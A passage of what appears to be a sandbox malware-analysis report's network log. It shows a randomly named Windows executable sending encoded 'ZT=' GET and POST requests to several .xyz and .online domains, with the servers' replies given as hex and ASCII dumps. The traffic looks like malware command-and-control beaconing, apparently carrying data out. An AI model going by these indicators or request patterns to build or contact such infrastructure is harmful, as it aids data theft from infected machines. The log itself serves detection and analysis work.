                                                                                                                                                                              Data Ascii: ZT=KHHZ406UZ5vtEMWPLr4GutemYqSAyxVC0tK4FxzEc8yNMRgSPhZe+FuZgUh234ow8u0H9IbzRRGFMD8mi56wSEaRLuF+i34kzrUzD5/w4oX3qhj3NeV2oxRkTKO9iGfueZe/Po5WTGZJsXhNJouzwd5EZjOUE8uykkMYag5fZ9EDVwyVZYpkIUrB8wLff09KXMeytV01zTd3iTl7qWzZuKc1qGpWBdY7M7XiVXKyRoIf3S0qiEwccSQDrJCBTllzvj1ETOo/GGxmp6pCDjGZs8jduFUi4+NoR4L5NklLRQqlgeg0CTkEQL6DsKZ6jICw6AdZ6w1bP76YiFZOGaTNxKdHZN0rd2W5NBi4+s94kjlNypQdX5NkjwxQzWy95/H6jivdYLxyKX4TIqF7aPDvCD0Fi6Wcs+XmzgSYtc10ydavmr+7MOjL4G0/I4itmGShTYrHQkcJj1vnZRvILiEEvNnIC28QiNvaKtkYQXOjC0PjDNbzouy/OR6mt3E4CIXkNzVEn6Rlw24qMCT4zcdQWI7qp/eS6AftXrFuH9PRoTCn1JQipRIUmVYPKI24iSD4G34AHK4e4FdaRyhM7HA6Tn3tjuJy9tVelt+S3TCjwU6UQ8B4OrCPeZPXobzmO0iSOyORrtUzd70XUqrAAm3LtcvyGLJzOl4PYZw/1iMhNzHryj7fkIs6St0UVgYPDgaHgizW3j225cTapc2PkzRBO6PuRaid7CQTNco/9/E+YgMcKIpUcyLnMcFy+CKfBGU8futbOpxVw6Oj2rohBXrQEIT65Q3ZbMOuXGeWVKykcWOA4giTXKWUFXaP5NkbXaFk1crimJx7SZfyNrwJYtomFWOIGIy4MHhEkr1jCwUiCR54Xw8ksgcQGJ7FGFAhbXiEkqs4dxupNKADpOkE6oYrWDwlXVoaabpJ7JuM5kyv+0PTA1g3GTVlj0/w09QtbefGUfwYKU69kJMQim9rj+vuGy12EdA4/jpLTulFzA1OCZH0Osq7q [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:22.550036907 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:22 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                              Oct 30, 2024 08:11:22.550060034 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.450000161.97.142.144803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:24.304682970 CET446OUTGET /2sun/?ZT=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:11:25.122616053 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:25 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Content-Length: 2966
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: "66cce1df-b96"
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:25.122648954 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                                                                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                                                                              Oct 30, 2024 08:11:25.122663021 CET424INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                                                                              Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                                                                                                                              Oct 30, 2024 08:11:25.122698069 CET274INData Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                                                                                                                                              Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              13192.168.2.45002013.248.169.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:30.302237034 CET719OUTPOST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 57 58 71 4a 59 31 4d 35 59 65 6c 69 48 46 54 71 72 64 5a 79 5a 71 4e 69 37 30 75 53 72 53 64 55 62 6f 2f 6d 38 66 57 6e 6b 79 6e 4d 56 73 78 5a 71 47 79 75 56 57 62 5a 75 4d 54 37 55 76 35 73 62 67 4c 69 36 4b 51 67 58 57 67 52 6a 6e 45 69 6b 4a 45 49 38 67 6b 6e 6a 4c 48 51 47 56 55 57 51 39 42 71 71 5a 59 4f 2f 4c 43 48 74 32 38 42 50 46 63 58 70 31 65 73 6b 71 58 78 51 6b 57 6f 65 63 68 4d 2f 64 74 62 59 39 45 63 34 42 4f 67 6a 61 6c 57 45 32 41 54 43 58 47 7a 6d 64 69 66 32 65 73 78 46 46 47 45 4f 45 4f 42 2f 69 7a 44 65 44 76 54 31 34 65 55 51 79 41 48 57 2f 61 44 42 51 3d 3d
                                                                                                                                                                              Data Ascii: ZT=WXqJY1M5YeliHFTqrdZyZqNi70uSrSdUbo/m8fWnkynMVsxZqGyuVWbZuMT7Uv5sbgLi6KQgXWgRjnEikJEI8gknjLHQGVUWQ9BqqZYO/LCHt28BPFcXp1eskqXxQkWoechM/dtbY9Ec4BOgjalWE2ATCXGzmdif2esxFFGEOEOB/izDeDvT14eUQyAHW/aDBQ==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.2.45002113.248.169.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:32.933159113 CET739OUTPOST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 57 58 71 4a 59 31 4d 35 59 65 6c 69 47 6c 44 71 6e 61 46 79 66 4b 4e 68 2b 30 75 53 6c 79 64 51 62 6f 37 6d 38 62 75 33 34 51 44 4d 56 4d 68 5a 72 43 6d 75 5a 32 62 5a 67 73 54 2b 61 50 35 64 62 67 50 71 36 50 6f 67 58 57 30 52 6a 6c 73 69 34 6f 46 36 38 77 6b 79 6f 72 48 53 4a 31 55 57 51 39 42 71 71 5a 4d 6b 2f 4c 36 48 74 69 34 42 64 57 45 55 31 46 65 6a 6c 71 58 78 61 30 57 73 65 63 68 69 2f 63 77 30 59 34 59 63 34 41 2b 67 67 4c 6c 56 4e 32 42 59 66 6e 48 50 76 64 57 55 76 74 56 58 4f 54 53 66 4f 6d 47 61 2b 6b 2b 5a 50 79 4f 45 6e 34 36 6e 4e 31 4a 7a 62 38 6e 4b 61 56 47 7a 74 73 57 61 4c 48 41 36 57 73 64 68 44 45 54 70 47 62 49 3d
                                                                                                                                                                              Data Ascii: ZT=WXqJY1M5YeliGlDqnaFyfKNh+0uSlydQbo7m8bu34QDMVMhZrCmuZ2bZgsT+aP5dbgPq6PogXW0Rjlsi4oF68wkyorHSJ1UWQ9BqqZMk/L6Hti4BdWEU1FejlqXxa0Wsechi/cw0Y4Yc4A+ggLlVN2BYfnHPvdWUvtVXOTSfOmGa+k+ZPyOEn46nN1Jzb8nKaVGztsWaLHA6WsdhDETpGbI=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.45002213.248.169.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:35.528155088 CET10821OUTPOST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 57 58 71 4a 59 31 4d 35 59 65 6c 69 47 6c 44 71 6e 61 46 79 66 4b 4e 68 2b 30 75 53 6c 79 64 51 62 6f 37 6d 38 62 75 33 34 51 4c 4d 57 2f 35 5a 72 6a 6d 75 58 57 62 5a 6f 4d 54 2f 61 50 35 41 62 67 33 51 36 50 74 58 58 56 4d 52 69 45 4d 69 30 4d 5a 36 33 77 6b 79 6e 4c 48 54 47 56 56 53 51 39 51 74 71 5a 63 6b 2f 4c 36 48 74 6b 55 42 65 46 63 55 6d 56 65 73 6b 71 58 74 51 6b 57 45 65 59 45 66 2f 63 45 65 5a 4c 41 63 34 67 75 67 77 74 52 56 43 32 42 61 63 6e 48 58 76 64 4c 4d 76 74 4a 4d 4f 54 4f 68 4f 6b 61 61 2f 6a 58 31 58 79 43 4e 77 37 47 74 53 47 68 6f 58 4e 48 38 44 53 65 4d 6a 64 4f 53 56 45 67 36 52 72 38 75 61 58 58 49 56 37 77 7a 6f 2f 44 4e 6f 4e 4b 77 4f 6a 71 58 6b 76 41 68 33 73 43 2f 78 45 34 2f 64 34 49 61 67 55 6d 70 44 49 6c 6e 6b 4d 41 50 33 33 54 58 58 35 55 5a 45 70 63 57 61 68 73 69 77 57 75 57 51 42 32 32 6e 6a 46 58 73 45 41 49 66 4b 4e 54 67 4a 6b 7a 76 72 2b 57 62 52 35 56 4e 54 6a 78 77 54 31 35 41 77 4c 41 4e 38 71 61 69 78 71 46 4e 2b 49 5a 68 76 4c 67 67 6d 44 [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=WXqJY1M5YeliGlDqnaFyfKNh+0uSlydQbo7m8bu34QLMW/5ZrjmuXWbZoMT/aP5Abg3Q6PtXXVMRiEMi0MZ63wkynLHTGVVSQ9QtqZck/L6HtkUBeFcUmVeskqXtQkWEeYEf/cEeZLAc4gugwtRVC2BacnHXvdLMvtJMOTOhOkaa/jX1XyCNw7GtSGhoXNH8DSeMjdOSVEg6Rr8uaXXIV7wzo/DNoNKwOjqXkvAh3sC/xE4/d4IagUmpDIlnkMAP33TXX5UZEpcWahsiwWuWQB22njFXsEAIfKNTgJkzvr+WbR5VNTjxwT15AwLAN8qaixqFN+IZhvLggmDvJPwBJIVocoysy5W85seTwy62t4OUPqNhlQjgBsUKXufDOJZNpp7o9btAo3GAzFWW6upodIvAyPGEKNXYdCLCMsuGrUMN6XzE7OSzuU1t8+rfYodruNTeM0qiqvOpSBLS9xS6/rFtVUuFYUegRmeTza4ihEDQ69mXcmqS5PDxgCmheBDODRRLl89lgk6M+2aHvqtm0SOvNDW2wsizYGuaHvSSht9J0cD0tNPWxjg6Z9q+yTwpUpc2sA+fRqetu6VwG4/0KLrBlA0z+i17DVJyVGzvgTT5DHryWJaBliCDLkbH936euMkRRQxp0fnJKQvapiP493pIRQnU6GqGy0nGJ4EO9cNARUDwFl0PewiGT8/EoH6Mq74hrUBpTfOUuDjROXlkdGAL13hX8R6vRh9kspPIadyDXh3lerFkRv0gmoABeJa4lUdlUSkjq6qk/l35/woLr3cH2+uQA9ZbWKNFrm/dstHmrwncH7p2zBicIDrScCxSKwg/wfHtGaMi62EJrQzLo8jisILJ/F6QbNqQqd1HDY8QR1uzTMRiADVcGC0t/LPGb4U9Wb4ZTkdT3OPiz36Z01EX14jnmWmyqmpdJ5Qocttf9NW//kiEaoWdnOd813LUBUq3ZY7NidVSc1sPRVwsbG0S5kpjpE5qyBXzTSAlpvgKwsJlB [TRUNCATED]


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              16192.168.2.45002313.248.169.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:38.066788912 CET448OUTGET /akxn/?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:11:38.719858885 CET394INHTTP/1.1 200 OK
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:38 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 254
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 54 3d 62 56 43 70 62 43 51 4f 5a 4b 38 52 4a 53 53 4f 70 62 74 6a 57 36 31 37 38 46 79 6b 6f 47 68 58 46 4f 44 56 71 59 79 70 6e 54 2b 6e 53 2b 70 61 6b 7a 79 44 5a 33 47 32 67 4a 7a 62 62 4b 42 35 62 6d 44 42 6f 6f 4a 53 62 78 6f 46 67 77 35 6e 38 38 52 51 34 67 4e 2b 73 70 79 34 42 33 56 32 53 50 52 38 79 66 4d 4d 31 4e 4c 4d 34 45 49 78 65 30 6f 66 71 6b 73 3d 26 6d 54 6b 44 3d 47 6a 32 54 69 32 54 30 67 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4"}</script></head></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              17192.168.2.450024198.251.84.200803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:43.883404016 CET728OUTPOST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 73 54 42 64 39 66 57 74 71 61 51 44 30 30 4c 45 7a 4c 6a 67 30 30 46 51 74 70 50 6a 79 52 4c 6b 79 42 61 51 7a 41 35 30 6d 31 39 5a 51 70 42 32 79 57 64 51 73 48 31 62 4d 71 6d 48 31 6c 39 79 32 61 37 4e 75 2f 75 70 78 71 6b 33 75 49 6e 68 41 57 35 6c 4b 6f 54 69 73 42 2f 71 64 71 41 45 65 6d 53 67 35 74 47 4c 41 2f 47 4a 4a 30 70 45 43 32 59 77 54 77 6b 32 39 44 6d 68 4f 46 6d 6c 48 67 37 50 6b 43 7a 62 69 45 62 35 75 63 61 76 4f 35 5a 44 70 39 44 43 6d 33 4e 6e 37 71 31 4b 4a 5a 2f 4f 58 5a 44 48 51 4a 58 33 39 63 4e 34 49 37 78 47 43 49 43 52 69 6c 42 6b 45 65 6c 7a 66 77 3d 3d
                                                                                                                                                                              Data Ascii: ZT=sTBd9fWtqaQD00LEzLjg00FQtpPjyRLkyBaQzA50m19ZQpB2yWdQsH1bMqmH1l9y2a7Nu/upxqk3uInhAW5lKoTisB/qdqAEemSg5tGLA/GJJ0pEC2YwTwk29DmhOFmlHg7PkCzbiEb5ucavO5ZDp9DCm3Nn7q1KJZ/OXZDHQJX39cN4I7xGCICRilBkEelzfw==
                                                                                                                                                                              Oct 30, 2024 08:11:44.784115076 CET908INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:44 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
